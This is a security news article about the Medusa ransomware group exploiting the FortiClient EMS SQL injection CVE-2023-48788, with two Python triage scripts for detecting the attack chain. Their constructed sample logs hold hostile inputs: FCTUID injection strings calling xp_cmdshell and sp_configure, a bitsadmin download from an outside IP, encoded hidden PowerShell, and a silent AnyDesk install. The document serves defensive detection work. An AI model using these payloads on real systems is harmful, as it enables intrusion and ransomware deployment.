Medusa Ransomware Group: Delivering Sophisticated Attacks

Medusa is a notorious ransomware group, first seen in 2021, that rose to prominence in 2023. Unlike most ransomware operators, Medusa maintains a presence on the visible (clear) web alongside its traditional Dark Web activities. It has been exploiting a critical vulnerability in Fortinet’s FortiClient EMS software, the SQL injection tracked as CVE-2023-48788, to launch sophisticated ransomware attacks.

Medusa, known for targeting a wide range of sectors, including healthcare, manufacturing, and education, has been quick to exploit the vulnerability.

The attackers send crafted web requests to the EMS server in which the FCTUID request header carries SQL statements instead of a client identifier. Because the header value is not adequately sanitised before it is used in a database query, the injected SQL runs against the backend Microsoft SQL Server instance, where it can invoke the xp_cmdshell extended stored procedure and so execute arbitrary operating-system commands on the server. xp_cmdshell is disabled by default in SQL Server, but a login with sufficient privilege can switch it on with sp_configure, and the same injected payload can do that before calling it.
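As an added example (not code from this article, from Fortinet, or from the attackers), the following Python triage script scans web-request log lines for FCTUID header values that carry SQL rather than a client identifier. The log layout, the 32-hex-character format assumed for a benign FCTUID, the client addresses and every sample line are constructed for illustration; adapt the parser to the real EMS log format before running it against production data.

```python
"""Triage web-request logs for SQL injection in the FCTUID header.

Added example for this article; not Fortinet's code and not the attackers'
tooling. The log format, field names and sample lines are constructed
(assumption: one request per line, with the FCTUID header value appended
as `FCTUID=<value>`). Adapt the parser to the real EMS log layout.
"""
import re
from collections import Counter

# Assumption: a benign FCTUID is an opaque 32-character hex identifier.
BENIGN_FCTUID = re.compile(r"^[0-9A-Fa-f]{32}$")

# Injection indicators: SQL metacharacters plus the T-SQL tokens an attacker
# needs to reach OS command execution through xp_cmdshell.
INDICATORS = {
    "quote": re.compile(r"'"),
    "statement_separator": re.compile(r";"),
    "sql_comment": re.compile(r"--|/\*"),
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "sp_configure": re.compile(r"sp_configure", re.I),  # used to enable xp_cmdshell
    "exec": re.compile(r"\bEXEC(UTE)?\b", re.I),
    "union_select": re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S),
}

# Assumed line layout: <timestamp> <client_ip> "<method> <path>" FCTUID=<value>
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+(?P<ip>\S+)\s+"(?P<method>[A-Z]+)\s+(?P<path>\S+)"\s+FCTUID=(?P<fctuid>.*)$'
)

# Constructed sample log (not a real capture).
SAMPLE_LOG = """\
2024-03-20T10:01:02Z 10.0.0.5 "POST /upload" FCTUID=7F8A2C1E4B5D6F7A8B9C0D1E2F3A4B5C
2024-03-20T10:01:09Z 203.0.113.7 "POST /upload" FCTUID=7F8A' ; EXEC master..xp_cmdshell 'whoami' --
2024-03-20T10:02:15Z 203.0.113.7 "POST /upload" FCTUID=7F8A' UNION SELECT 1,2,3 --
2024-03-20T10:02:40Z 203.0.113.7 "POST /upload" FCTUID=7F8A'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
2024-03-20T10:03:00Z 10.0.0.6 "POST /upload" FCTUID=0123456789ABCDEF0123456789ABCDEF
"""


def classify_fctuid(value):
    """Return the names of the indicators that fire on one header value."""
    if BENIGN_FCTUID.match(value):
        return []
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(value)]
    if not hits:
        hits.append("unexpected_format")  # not a 32-hex id, but no known SQL tokens
    return hits


def triage(log_text):
    """Parse the log and return one finding per suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line; in production, count these as well
        hits = classify_fctuid(m.group("fctuid"))
        if hits:
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "path": m.group("path"),
                "fctuid": m.group("fctuid"),
                "indicators": hits,
            })
    return findings


def sources_by_hits(findings):
    """Count suspicious requests per client IP, to order blocking and triage."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    results = triage(SAMPLE_LOG)
    for f in results:
        print(f"line {f['line']}: {f['ip']} {f['indicators']}")
    print(sources_by_hits(results))
```

The benign-format check comes first so that a legitimate identifier is never scanned for keywords; anything that fails it is examined for SQL tokens, and a value that is neither a well-formed id nor recognisable SQL is still reported, because an opaque header that changes shape is itself worth a look.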

Once initial access is gained, Medusa creates a webshell on the compromised server to facilitate data exfiltration and payload delivery.  

The group uses bitsadmin, the command-line client for the Windows Background Intelligent Transfer Service (BITS), to pull malicious files onto victim systems and to establish persistence.

Medusa’s attack chain showcases the group’s capabilities, particularly in execution and defence evasion. After gaining a foothold, Medusa uses PowerShell scripts to run commands, exfiltrate data and execute its ransomware payload.

The group’s malware, known as gaze.exe, kills various services and loads files referencing Tor links for data exfiltration.

To evade detection, Medusa installs tampered versions of legitimate remote monitoring and management (RMM) tools such as ConnectWise and AnyDesk. Because these tools are trusted and often already present in the victim’s environment, the attacker-controlled copies tend to go unnoticed.

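Each post-exploitation step above (a shell spawned through xp_cmdshell, the webshell, the bitsadmin download, PowerShell execution, service termination by gaze.exe, an unapproved RMM install) leaves a process-creation trail. As an added example, not the article’s content, the group’s tooling or any vendor’s detection rule, this Python script applies one heuristic per step to constructed Sysmon-style process events. The event schema, the sample events, the web-server and RMM binary names and the allow-lists are assumptions; the ATT&CK technique IDs in the labels are the standard ones for these behaviours.

```python
"""Process-creation triage for the Medusa post-exploitation chain.

Added example for this article; not the group's tooling and not a vendor
rule set. Event shape (assumption): dicts with id, parent_image, image and
command_line, as projected out of Sysmon Event ID 1 or an EDR feed.
All sample events are constructed; the allow-lists are placeholders.
"""
import re

# Assumed web-server processes on the EMS host; a shell under them is a
# webshell or server-side command injection until proven otherwise.
WEB_SERVERS = {"httpd.exe", "w3wp.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumed binary names for the RMM tools named in the article.
RMM_BINARIES = {"anydesk.exe", "screenconnect.clientsetup.exe",
                "screenconnect.windowsclient.exe"}
# Parents from which stopping services is routine (placeholder list).
SERVICE_MANAGERS = {"services.exe", "mmc.exe", "explorer.exe"}

SERVICE_STOP = re.compile(
    r"\b(net1?(\.exe)?\s+stop|sc(\.exe)?\s+stop|taskkill(\.exe)?\s)", re.I)
PS_SUSPICIOUS = re.compile(
    r"-(enc|encodedcommand|e)\b|downloadstring|invoke-webrequest|\biwr\b|-w(indowstyle)?\s+hidden",
    re.I)
BITS_DOWNLOAD = re.compile(r"/transfer\b.*https?://", re.I | re.S)

# Constructed sample events (not real telemetry).
EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"id": 2, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer upd /download /priority high http://203.0.113.7/x.exe C:\Windows\Temp\x.exe"},
    {"id": 3, "parent_image": r"C:\Program Files\Apache\bin\httpd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"id": 4, "parent_image": r"C:\Windows\Temp\gaze.exe",
     "image": r"C:\Windows\System32\net.exe", "command_line": 'net stop "BackupService"'},
    {"id": 5, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\AnyDesk.exe",
     "command_line": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent"},
    {"id": 6, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": r"notepad.exe C:\Users\a\notes.txt"},
    {"id": 7, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile Get-Process"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event, approved_rmm=frozenset()):
    """Return the chain-step labels that fire on one event."""
    parent = _basename(event["parent_image"])
    image = _basename(event["image"])
    cmd = event["command_line"]
    hits = []
    if parent == "sqlservr.exe" and image in SHELLS:
        hits.append("shell spawned by SQL Server: xp_cmdshell execution")
    if parent in WEB_SERVERS and image in SHELLS:
        hits.append("shell spawned by web server: webshell (T1505.003)")
    if image == "bitsadmin.exe" and BITS_DOWNLOAD.search(cmd):
        hits.append("bitsadmin download from URL (T1197)")
    if image in {"powershell.exe", "pwsh.exe"} and PS_SUSPICIOUS.search(cmd):
        hits.append("hidden or encoded PowerShell (T1059.001)")
    if SERVICE_STOP.search(cmd) and parent not in SERVICE_MANAGERS:
        hits.append(f"service stop from unusual parent {parent} (T1489)")
    if image in RMM_BINARIES and image not in approved_rmm:
        hits.append(f"unapproved remote-access tool {image} (T1219)")
    return hits


def triage_events(events, approved_rmm=frozenset()):
    """Return only the events that hit at least one heuristic."""
    out = []
    for ev in events:
        hits = classify(ev, approved_rmm)
        if hits:
            out.append({"id": ev["id"], "image": _basename(ev["image"]), "hits": hits})
    return out


if __name__ == "__main__":
    for finding in triage_events(EVENTS):
        print(finding["id"], finding["image"], finding["hits"])
```

The RMM rule is deliberately an allow-list rather than a signature: the binaries are legitimate, so the only reliable question is whether this host is supposed to have them. Pass the names your IT team actually deploys as `approved_rmm` and the rule stays quiet for sanctioned installs while still flagging an attacker-dropped copy of the same tool.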
Organisations can adopt a multi-layered approach to defend against Medusa’s ransomware attacks. Robust patch management is crucial so that vulnerabilities like the Fortinet flaw are addressed promptly.

Network segmentation, regular backups and employee security awareness training are all essential components of a comprehensive defence strategy. As ransomware becomes increasingly sophisticated, it remains vital that organisations stay vigilant and have recovery plans in place.

Bitdefender   |     CyberCX   |     Cyberpress   |     Cybersecurity News   |    TTB Internet Security    |   SRM Inform

Image: Unsplash
